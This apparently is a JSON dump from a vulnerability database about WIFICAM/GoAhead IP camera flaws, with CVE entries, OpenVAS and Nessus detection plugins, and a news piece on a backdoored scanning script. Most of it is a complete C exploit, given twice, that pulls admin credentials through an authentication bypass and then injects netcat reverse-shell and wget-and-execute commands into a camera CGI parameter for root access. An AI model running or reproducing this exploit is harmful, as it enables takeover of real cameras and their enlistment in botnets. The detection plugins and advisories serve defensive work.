printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS 
]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... 
\", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92748"}], "zdt": [{"lastseen": "2018-01-05T21:33:08", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2017-11-15T00:00:00", "published": "2017-11-15T00:00:00", "href": "https://0day.today/exploit/description/29003", "id": "1337DAY-ID-29003", "type": "zdt", "title": "WIFICAM Wireless IP Camera (P2P) - Unauthenticated Remote Code Execution Exploit", "sourceData": "#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n \r\n \r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET 
/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n \r\n \r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n \r\nchar * creds(char *argv,\r\n int get_config);\r\n \r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n \r\n \r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n \r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n \r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n \r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n \r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n \r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n \r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n \r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n \r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n \r\n return (0);\r\n}\r\n 
\r\n \r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n \r\n \r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n \r\n printf(\"[+] bypassing auth ... \");\r\n \r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n \r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n \r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n \r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n \r\n close(sock);\r\n \r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n \r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... 
\r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n \r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n \r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n \r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n \r\n \r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n \r\n return (out);\r\n }\r\n }\r\n }\r\n \r\n free(tmp);\r\n \r\n return (NULL);\r\n}\r\n \r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n \r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n \r\n sock = 0;\r\n \r\n printf(\"[+] %s payload ... 
\", desc);\r\n \r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n \r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n \r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n \r\n \r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n \r\n return (0);\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/29003", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "description": "The IP-Camera is prone to multiple vulnerabilities.\n\n This vulnerability was known to be exploited by the IoT Botnet ", "modified": "2019-03-08T00:00:00", "published": "2017-03-08T00:00:00", "id": "OPENVAS:1361412562310106636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106636", "title": "Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mult_ip_cameras_mult_vuln.nasl 14045 2019-03-08 07:18:46Z cfischer $\n#\n# Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as 
published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106636\");\n script_version(\"$Revision: 14045 $\");\n script_cve_id(\"CVE-2017-8224\", \"CVE-2017-8222\", \"CVE-2017-8225\", \"CVE-2017-8223\", \"CVE-2017-8221\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 08:18:46 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:16:59 +0700 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_name(\"Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 81);\n script_mandatory_keys(\"GoAhead-Webs/banner\");\n\n script_tag(name:\"summary\", value:\"The IP-Camera is prone to multiple vulnerabilities.\n\n This vulnerability was known to be exploited by the IoT Botnet 'Reaper' in 2017.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP request to read the 
system configuration and checks\n the response.\");\n\n script_tag(name:\"insight\", value:\"Multiple IP-Cameras are prone to multiple vulnerabilities:\n\n - Backdoor account\n\n - RSA key and certificates\n\n - Pre-Auth Info Leak (credentials) within the GoAhead http server\n\n - Authenticated RCE as root\n\n - Pre-Auth RCE as root\n\n - Streaming without authentication\n\n - Unsecure Cloud functionality\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code and read arbitrary\n files.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_xref(name:\"URL\", value:\"https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html\");\n script_xref(name:\"URL\", value:\"https://blogs.securiteam.com/index.php/archives/3043\");\n script_xref(name:\"URL\", value:\"http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/\");\n\n exit(0);\n}\n\ninclude(\"dump.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default: 81);\n\nurl = \"/system.ini?loginuse&loginpas\";\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\ntmp = bin2string(ddata: res, noprint_replacement: \" \");\nif (strlen(res) > 4000 && (egrep(pattern: \"([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})\", string: tmp) ||\n \"IPCAM\" >< res || \"admin\" >< res)) {\n if (http_vuln_check(port: port, url: \"login.cgi\", pattern: 'var loginpass=\".*\";', check_header: TRUE)) {\n report = report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:17:11", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.", "modified": "2017-05-05T13:38:00", "id": "CVE-2017-8224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8224", "published": "2017-04-25T20:59:00", "title": "CVE-2017-8224", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:17:11", "bulletinFamily": "NVD", "description": "On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.", "modified": "2017-05-05T13:39:00", "id": "CVE-2017-8223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8223", "published": "2017-04-25T20:59:00", "title": "CVE-2017-8223", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:19:26", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices have an \"Apple Production IOS Push Services\" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-8222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8222", "published": "2017-04-25T20:59:00", "title": "CVE-2017-8222", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:19:26", "bulletinFamily": "NVD", "description": "On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. 
An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-8225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8225", "published": "2017-04-25T20:59:00", "title": "CVE-2017-8225", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-04T12:19:26", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-8221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8221", "published": "2017-04-25T20:59:00", "title": "CVE-2017-8221", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2018-01-27T09:17:28", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-Vy0HEiTVyCg/WgP6ZUvskoI/AAAAAAAAuqs/l16VDHFQJIUXXv0KPkfnTK6wrGJMIbjdACLcBGAs/s1600/iot-vulnerability-scanner-script.png>)\n\nNothing is free in this world. \n \nIf you are searching for free hacking tools on the Internet, then beware\u2014most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a scam. \n \nFor example, [Cobian RAT](<https://thehackernews.com/2017/09/backdoored-hacking-tools.html>) and a [Facebook hacking tool](<https://thehackernews.com/2016/02/facebook-hacking-tool.html>) that we previously reported on The Hacker News actually could hack, but of the one who uses them and not the one you desire to hack. 
\n \nNow, a security researcher has spotted another hacking tool\u2014this time a PHP script\u2014which is freely available on multiple popular underground hacking forums and allows anyone to find vulnerable internet-connected IP Cameras running the vulnerable version of GoAhead embedded web-server. \n \nHowever, after closely analysing the scanning script, Newsky Security researcher Ankit Anubhav found that the tool also contains a secret backdoor, which essentially allows its creator to \"_hack the hacker._\" \n\n\n> \"For an attacker\u2019s point of view, it can be very beneficial to hack a hacker,\" Anubhav [said](<https://blog.newskysecurity.com/script-kiddie-nightmare-iot-attack-code-embedded-with-backdoor-39ebcb92a4bb>).\n\n> \"For example, if a script kiddie owns a botnet of 10,000 IoT and if he gets hacked, the entire botnet is now in control of the attacker who got control of the system of this script kiddie. Hence, by exploiting one device, he can add thousands of botnets to his army.\"\n\nThe rise of IoT botnet and release of [Mirai's source code](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>)\u2014the biggest [IoT-based malware](<https://thehackernews.com/2016/11/mirai-router-offline.html#search>) threat that emerged last year and [took down Dyn DNS service](<https://thehackernews.com/2016/10/ddos-attack-mirai-iot.html>)\u2014has encouraged criminal hackers to create their massive botnet either to launch DDoS attacks against their targets or to rent them to earn money. 
\n\n\n[](<https://1.bp.blogspot.com/-rbUS0_INUz4/WgP5tRM2S-I/AAAAAAAAuqk/N7u65SrGoIoCsLbEci72EwGLdes-D-oIgCLcBGAs/s1600/iot-vulnerability-scanner.png>)\n\n \nAs shown in the self-explanatory flowchart, this IoT scanning script works in four steps: \n\n\n * First, it scans a set of IP addresses to find GoAhead servers vulnerable to a previously disclosed authentication bypass vulnerability ([CVE-2017-8225](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html#pre-auth-info-leak-goahead>)) in Wireless IP Camera (P2P) WIFI CAM devices.\n * In the background, it secretly creates a backdoor user account (_username: VM | password: Meme123_) on the wannabe hacker's system, giving the attacker same privilege as root.\n * Script also extracts the IP address of the wannabe hacker, allowing script author to access the compromised systems remotely.\n * Moreover, it also runs another payload on the script kiddie\u2019s system, eventually installing a well-known botnet, dubbed Kaiten.\nThis tool is another example of backdoored hacking tools increasingly being distributed at various underground forums to hack the hacker. \n \nIn September, a backdoored Cobian RAT builder kit was spotted on multiple underground hacking forums for free but was caught containing a backdoored module that aimed to provide the kit's authors access to all of the victim's data. \n \nLast year, we reported about another Facebook hacking tool, dubbed _Remtasu_, that actually was a Windows-based Trojan with the capability to access Facebook account credentials, but of the one who uses it to hack someone else. 
\n \nThe bottom line: Check free online tools very carefully before using them.\n", "modified": "2017-11-09T07:03:13", "published": "2017-11-08T19:55:00", "id": "THN:F659F177E9871AC527A9D7C561D7ABDF", "href": "https://thehackernews.com/2017/11/iot-vulnerability-scanner.html", "type": "thn", "title": "Hacker Distributes Backdoored IoT Vulnerability Scanning Script to Hack Script Kiddies", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T07:40:18", "bulletinFamily": "scanner", "description": "The remote server uses a version of GoAhead that allows a remote\nunauthenticated attacker to download the system.ini file. This file\ncontains credentials to the web interface, ftp interface, and others.", "modified": "2019-12-02T00:00:00", "id": "GOAHEAD_PASSWORD_LEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/102174", "published": "2017-08-03T00:00:00", "title": "GoAhead System.ini Leak", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102174);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-8225\");\n\n script_name(english:\"GoAhead System.ini Leak\");\n script_summary(english:\"Extracts username and password from GoAhead server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote server is vulnerable to an information leak that\ncould allow a remote attacker to learn the admin username and password\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote server uses a version of GoAhead that allows a remote\nunauthenticated attacker to download the system.ini file. 
This file\ncontains credentials to the web interface, ftp interface, and others.\");\n # http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad0d0c84\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If possible, update the device's firmware and ensure that the HTTP server is\nnot accessible via the internet.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:U/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8225\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/goahead\");\n script_require_ports(\"Services/www\", 80, 81, 82, 83);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:81, embedded:TRUE);\nbanner = get_http_banner(port:port);\nif (\"Server: GoAhead-Webs\" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, \"GoAhead-Webs\");\n\nuri = '/system.ini';\nres = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\nif (isnull(res) || \"401\" >!< res[0])\n{\n # try system-b.ini\n uri = '/system-b.ini';\n res = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\n if (isnull(res) || \"401\" >!< res[0])\n {\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n }\n}\n\n# We've been blocked from the ini script. Bypass by\n# providing empty creds.\nuri += '?loginuse&loginpas&apos';\nres = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\nif (isnull(res) || \"200\" >!< res[0] || len(res[2]) == 0)\n{\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n}\n\n# We have a response with a payload. 
